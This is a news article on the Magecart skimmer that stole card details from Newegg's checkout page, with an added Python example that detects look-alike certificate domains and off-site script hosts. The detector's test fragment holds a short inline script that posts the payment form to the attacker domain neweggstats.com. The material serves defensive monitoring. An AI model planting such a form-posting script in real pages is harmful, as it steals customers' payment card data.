The infamous Magecart code has struck again, with an attack group this time using it to skim card details from customers of online retailer Newegg for a full month, according to researchers.
The US-based, tech-focused e-tailer has yet to release a statement on the news, but RiskIQ, which has been following Magecart closely over the past couple of years, posted an analysis of the attack yesterday.
Threat researcher Yonathan Klijnsma explained that, just as in the recently disclosed British Airways (BA) breach, the attackers made a concerted effort to blend into the background to avoid detection.
They did this by first registering a look-alike of the primary newegg.com domain and obtaining a Comodo TLS certificate for it, so that the exfiltration traffic would travel over valid HTTPS and look like any other request from the checkout page. The IP address the domain resolved to hosted a back-end server where the skimmed card data was apparently collected.
The attackers then struck on or around August 14, inserting the Magecart skimmer into the retailer's payment processing page, where it went undetected for a month.
“The skimmer code is recognizable from the British Airways incident, with the same base code. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways,” explained Klijnsma.
“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script.”
The code worked on both mobile and desktop versions of the site, and with estimated visitors to Newegg regularly numbering over 50 million per month, this could point to another significant breach of card data, according to RiskIQ.
“The attack on Newegg shows that while third parties have been a problem for websites — as in the case of the Ticketmaster breach — self-hosted scripts help attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer,” concluded Klijnsma.
“We urge banks to issue new cards or added protection through OTP on cards they can correlate belonging to transactions that occurred on Newegg between August 14 and September 18.”
Newegg claims it is still determining which customer accounts have been affected.
Craig Young, security researcher at Tripwire, argued that organizations should be monitoring certificate transparency logs more closely to spot the early warning signs of an attack.
“In this case, the attack campaign started with the attackers setting up an HTTPS server at neweggstats.com,” he explained. “For Newegg, seeing this domain come online wouldn’t immediately indicate a breach, but it should be enough for a security team to investigate further and likely reveal the newly added references to this domain in their checkout code.”
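The two warning signs described above, a look-alike domain appearing in certificate transparency logs and a checkout page that suddenly references that domain, are both things a security team can check for mechanically. The following Python is an added example written for this article, not RiskIQ's, Tripwire's or Newegg's code. The CT-log records, the checkout-page fragment, the allow-list of trusted domains and the edit-distance threshold are all constructed for illustration; only the domain neweggstats.com comes from the article.

```python
"""Two checks implied by the article's recommendations, run over constructed data:
1. flag newly logged certificates for domains that imitate a brand
2. flag script references in a checkout page that point to untrusted hosts
Assumptions (not from the article): the log-entry format, the allow-list,
the brand token and the edit-distance threshold are illustrative choices."""
import re
from urllib.parse import urlparse

# Constructed sample of what a CT-log monitor might return, one record per
# logged leaf certificate. Only neweggstats.com is named in the article.
CT_ENTRIES = [
    {"domain": "secure.newegg.com", "issuer": "DigiCert"},
    {"domain": "neweggstats.com", "issuer": "COMODO"},
    {"domain": "newegg-support.net", "issuer": "Let's Encrypt"},
    {"domain": "nevvegg.com", "issuer": "COMODO"},
    {"domain": "example.org", "issuer": "DigiCert"},
]

TRUSTED_DOMAINS = {"newegg.com", "neweggbusiness.com"}  # assumed allow-list
BRAND = "newegg"  # brand token to watch for in new certificates


def registrable(domain):
    """Crude eTLD+1: the last two labels. Adequate for .com-style names;
    a production monitor would consult the public suffix list instead."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_trusted(domain):
    """True when the domain (or its parent) is on the allow-list."""
    return registrable(domain) in TRUSTED_DOMAINS


def edit_distance(a, b):
    """Levenshtein distance, used to catch typo-squats such as 'nevvegg'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domains(entries, brand=BRAND, max_dist=2):
    """Return domains from CT entries that imitate the brand and are not on
    the allow-list: the brand token is embedded in the registrable label
    (neweggstats, newegg-support) or the label is within max_dist edits of
    it (nevvegg). Order follows the log."""
    hits = []
    for entry in entries:
        domain = entry["domain"]
        if is_trusted(domain):
            continue
        label = registrable(domain).split(".")[0]
        if brand in label or edit_distance(label, brand) <= max_dist:
            hits.append(domain)
    return hits


# Constructed checkout-page fragment (not Newegg's real page). The inline
# script posts the payment form to an off-site host, which is exactly the
# kind of reference the article says a team should find in its checkout code.
CHECKOUT_HTML = """
<script src="https://secure.newegg.com/js/checkout.js"></script>
<script>
  var endpoint = 'https://neweggstats.com/collect';
  document.getElementById('checkout').addEventListener('submit', function () {
    fetch(endpoint, {method: 'POST', body: new FormData(this)});
  });
</script>
"""

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def foreign_script_hosts(html, trusted=TRUSTED_DOMAINS):
    """Every host referenced by an absolute URL inside the page's <script>
    elements (src attributes and inline bodies) whose registrable domain
    is not on the allow-list, sorted for stable output."""
    hosts = set()
    for tag in re.finditer(r"<script\b[^>]*>.*?</script>", html, re.S | re.I):
        for url in URL_RE.findall(tag.group(0)):
            host = urlparse(url).hostname
            if host and registrable(host) not in trusted:
                hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    print("look-alike certificates:", lookalike_domains(CT_ENTRIES))
    print("off-site script hosts:", foreign_script_hosts(CHECKOUT_HTML))
```

Neither check proves a compromise on its own: a look-alike certificate may be a squatter or a marketing agency, and an off-site script host may be a legitimate third party. The point Young makes is that the combination, a new imitation domain followed by a reference to it from the payment page, is specific enough to justify an immediate look at the checkout code, and both signals can be watched continuously rather than discovered a month later.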
UPDATE
Newegg later posted a tweet to its timeline, saying it had learned that one of its servers had been injected with malware "which was identified and removed from our site. We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted."